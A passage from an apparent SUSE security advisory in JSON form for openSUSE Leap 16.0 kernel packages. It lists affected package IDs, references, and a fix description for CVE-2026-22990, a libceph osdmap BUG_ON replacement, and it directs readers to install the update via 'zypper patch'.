"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22989"
},
{
"cve": "CVE-2026-22990",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22990"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: replace overzealous BUG_ON in osdmap_apply_incremental()\n\nIf the osdmap is (maliciously) corrupted such that the incremental\nosdmap epoch is different from what is expected, there is no need to\nBUG. Instead, just declare the incremental osdmap to be invalid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22990",
"url": "https://www.suse.com/security/cve/CVE-2026-22990"
},
{
"category": "external",
"summary": "SUSE Bug 1257221 for CVE-2026-22990",
"url": "https://bugzilla.suse.com/1257221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
